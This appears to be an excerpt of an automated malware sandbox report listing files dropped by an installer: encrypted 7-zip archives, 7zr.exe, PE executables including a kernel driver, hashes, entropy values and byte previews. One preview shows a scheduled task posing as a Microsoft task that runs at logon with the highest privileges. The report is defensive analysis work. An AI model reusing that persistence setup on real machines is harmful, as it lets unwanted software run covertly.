Malicious: false
                              Preview:.@S........,...............}..T....N.W....D..,nk.m..a%.kc..k!87.SM]..5.?.."\.z"..+l:...v.....R.E..r...j:......`...Z:...s...W.b...N....(..XF....>.Z.....PhGWp^b!....0..R.y.t..).z,q....43.UH......b\.@F.S......F....OO`.....J:...J#..fT&eA..1...P.^.......{............o.k..O......q.D(.g..].o...j..a.y.<.f@.l.6..c........F........v....v.....s..3.1..Jw.m.|..I(BSm..z...5u....@y.$T)..lW`a1kP/.0.....b...X.kS..t1..r....G...G..;..Q.z...P....T.'*...u.&.x@.8..IKK.}......}T...t5.$..'..&.-?u}..j.~}JAq".!c.....x~.v.e.C...\.B... ..............;[.H...q.n.y.yf"p.@.`.......WyY...u...+.....'..B..h.........E-."r.v.5.$p..*.R..=.s...Mj.....jy.JQ.......c.=.l..0.\[k..#Ph)..&........Nd;H...)o.Q.8..A:...Q..^......M.. .:7........X.>.4.raf.j.L..{...............ZI8..5..........P|.O..+dZ.Z....Z._.t..!.j5..N.G$.F33vc."D...?[..);X.......vYCp..N.;."}..hn.wk?..y.../1P,..5v..KX....Z. ...g..+......p..v4.&..~..a...K.."..S. ..*.........Rr3}.X....d|G....t..+P.&W/n..u.uA..........GP$..d
Process: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 5649408
Entropy (8bit): 6.392614480390128
Encrypted: false
SSDEEP: 98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5: 8C71B86BF407C05BAF11E8D296B9C8B8
SHA1: 6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256: BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512: BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.997011252064675
                              Encrypted:true
                              SSDEEP:1536:MsEZo4RLSOELwdAAOTXo+Pqyq5P5J74UmnNap/FOtP08J:8y4RLddAAOTXoKqZZQn1
                              MD5:DB0ACE7AA74DAA24BB781119C3C869AE
                              SHA1:07A3730409AFB5070EC735425E77B492B6EBA129
                              SHA-256:3FF34DB386F861828A302E5A4AD3E57409CAA8D4CCF5C867F80C2C8B514AF30D
                              SHA-512:8FDBB6D6D195AB1EE949DBD855D4E6B1E58EEFF7191D667E9A8737C27A2ED0326AF905496CC61156FE48B2443FA1846DE668C5630F200E3408981B3AB439395C
                              Malicious:false
                              Preview:.@S.....Q..l ...............L......h..|y}.......O..Fo.u.+..+.j.ca..v.@.....&....c[/.f..E.....o*Ck.\......J...v.o.N..J.._._\Y.1.-..f/....K.....}"..i.|h.[..y1.1w...k.t..L.....V..<.X.........P..(...~q.$..Z...r$....}......-.D.....&.?K..u3.7.....0.....vi6{{.....S..}...*..%./....B[...uc..o....h9?.Pl.....}.q'.....N.-..:.....-(...8.........=B.pah.n...1.Mdp~7@......%r.N3I...R.P.}=j.^......,.p.9.........L.e6....A.+.k]`f..;O.9/hU@........x...%&.C.YR.....n..IA..ZG*>......%.Y92..4z.....H....].9..K*..\O.o..^S.....P..B...!h...z.S..h.....7UkS."Exy}..q._c.,.19...>C..W.<RQ.v......U..h.....XpG.%.X.......}........_`....."L....G'g.. .*K...0..z.P..1..\......7..3....y...2........X...W...8......E.@Y[....Z.."..0..u.wC.M.+....`...%._m.F..}iC...C.{..4..:9......I..@C.y..s%.6.C.....=...f.a^...e...A..y..?.....n....W....k.J.{.......i(.{iZ.......Z`\....H....J..WT...+.....I..[O.._....k[..h..........A...1'..p.4.co...e...2.R..KIP.j.._.B...]!.as. ...1..8..@....q.7.h.$F.
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.99701125206467
                              Encrypted:true
                              SSDEEP:1536:DzeJcAKCT4h5YjqiOU+HyhjI3GKG0pY0e7zjuX+u:Dz4DtTfd/yvY0e7uJ
                              MD5:09A8667EA9E45CA2FDD69DB8D762B163
                              SHA1:0FADBFC5D02C59B7DB8C9CA9EB437FA7A6AE80FA
                              SHA-256:DACDD802F11565D9F8321D7884C8E865E6868EF1647794BFF17B063AB9234992
                              SHA-512:21A78AE277171BE6E3E6155F2753DA1E58C96AFD068BEE36884C91DF2BE831E225BC1652CCF56400311E6266749CEA1328B9BF4811C7A736BBE237C3E5D5DBDE
                              Malicious:false
                              Preview:7z..'...z..........2.......y.[....5..4....]2;G}l0.B.....r.E..V.O...(.8.r..^Q.....V...u..<...n.....7V.0..tw8~.m..~.f....\P.......K..(...13S.v.W:O...`y.4.....H....'.....1....s$[.I0Y...2q.cU.b.w._..gw...+p..j..T..>.f.M@^...-e,....~..}W.....^..H3.,L1:........)@kT.t..}>.[..N..Y(Pu...c.7..i_7/...0..sr.BO....ibJtN....T.H......RYn..X..Ifa\Z.f ..e...`...........WSq.t......p.[./.Z......y.;_<......`..j)..M...CT@i.{.~.....2.......q.HBL{....I...q.u....&.-..4..5......(.p........!...20<'....&...A..@....`:.......~z._.....N.2.%^.k.h];x..........O_....A..u..lf...+.a.....}!.gT].6,.<a..6n....pt.S.v.}n<Wj.{u~..0.4....../.M....._J...fL:u.V..&.:'.[..t..;'#K..z.[I6.of.b.....QK=.....@...PM.o...Vf..."*Ssh.3M'.K1._..&..}.q...~~..._.C.f..G.$&...m.m.Q.$..$...<.V6.Jg..*.......>...n"..'a.....O... .V..jR.."h..a...PD..aH...Dl2.Y..._W"3'.R..f...Y/...[..L....*....>9...1B..:n~,.M.T[%.G2....t.7nt..)".X]..<.nD.....@..IO.d. ..g ...-um.*."-...s.d!.Q...^...u.?.4.\l.#'{..H_......?.x
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996966859255975
                              Encrypted:true
                              SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                              MD5:CEA69F993E1CE0FB945A98BF37A66546
                              SHA1:7114365265F041DA904574D1F5876544506F89BA
                              SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                              SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                              Malicious:false
                              Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996966859255979
                              Encrypted:true
                              SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                              MD5:4CB8B7E557C80FC7B014133AB834A042
                              SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                              SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                              SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                              Malicious:false
                              Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                              MD5:8622FC7228777F64A47BD6C61478ADD9
                              SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                              SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                              SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                              Malicious:false
                              Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                              MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                              SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                              SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                              SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                              Malicious:false
                              Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.99759370165655
                              Encrypted:true
                              SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                              MD5:950338D50B95A25F494EE74E97B7B7A9
                              SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                              SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                              SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                              Malicious:false
                              Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.997593701656546
                              Encrypted:true
                              SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                              MD5:059BA7C31F3E227356CA5F29E4AA2508
                              SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                              SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                              SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                              Malicious:false
                              Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653607
                              Encrypted:true
                              SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                              MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                              SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                              SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                              SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                              Malicious:false
                              Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653608
                              Encrypted:true
                              SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                              MD5:A9C8A3E00692F79E1BA9693003F85D18
                              SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                              SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                              SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                              Malicious:false
                              Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999161200123717
                              Encrypted:true
                              SSDEEP:6144:BBfinFeH/n/oxa9p5nKMF7W9uvN/jl3eTYjg0c+YRRbMQL:BBfiFePQxa9pFhYmN/S0rgRZ
                              MD5:7A1992BF55B34786E192E7FF0E870B6C
                              SHA1:CF5E5EB0C9133A9E6162731440462B88191F4672
                              SHA-256:187BCFD1E40E2DF985E8F3456ECC94347C608C8151BF7F1A4524D66B118A7B60
                              SHA-512:48792B91D46D070A6B4D97D072CCF302452C163A5576D419398FAD3D958ADF19B5739BC026068984C149F20051CBEB0DAB91EFF47468E6AD7EBEB2B08003F29D
                              Malicious:false
                              Preview:7z..'...;.(J .......@.......>.~..r"&9.d.[|6..]T..a.]...4..6.......I".w....s...V...l..;B..?..'.5.y.."..8. .?YM....9.]..^.....!..8C$..=1... 3..V.}.e3._.............UI...m..%....jl....g..~O....R..#|.7.M....h.<....X(yCa...).5..\8.......= zg....?U..8...9.]B}...dWm>.|../..=..@.. ....@O..H|.C*..oe.H...;..`.t..a....p.$...Y-n.7{..XX.G.Ex.|.>.`.(G..e.Lz......]r....?.....x.B.g..5....\.......h...:u...6...q.........f|.L....z.~..s..X.]...G<k&....."c9...}..&.t!...<.+.#..2..w.<........T..7...%..4........ly!.f....d...}...(P...O.EHU|i9...a.'%...X.4...W...#....[....>..TD"}...|.].Np..E=b...d3...l....K..9%;.0...........R+..fQ...#0...`...J.......YEtk-...7......=k...b;.H&...^(\t....Qg..2.....z...tb.h..W.u..'.=..u..h_H. W.../.Y...7.....n.'p.Ys.uV<m#....K#.#;.0B..b&=9..Q./7..L.;.=3...8i.=2M.<.............Y.h._.E...Ft..TS.....=....O.*...E....y..........z,..F..1.K...d..l.CYE.x..E@...O\.fQ.....C.j#..B.x.Qs.?..N34'....'.S<.....gC!x.........0......`...((6Di... F|.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):63640
                              Entropy (8bit):6.482810107683822
                              Encrypted:false
                              SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                              MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                              SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                              SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                              SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 9%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.3482223822620667
                              Encrypted:false
                              SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                              MD5:1E1D0466AB0FE8F2802587D337A10567
                              SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                              SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                              SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                              Malicious:false
                              Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):5649408
                              Entropy (8bit):6.392614480390128
                              Encrypted:false
                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
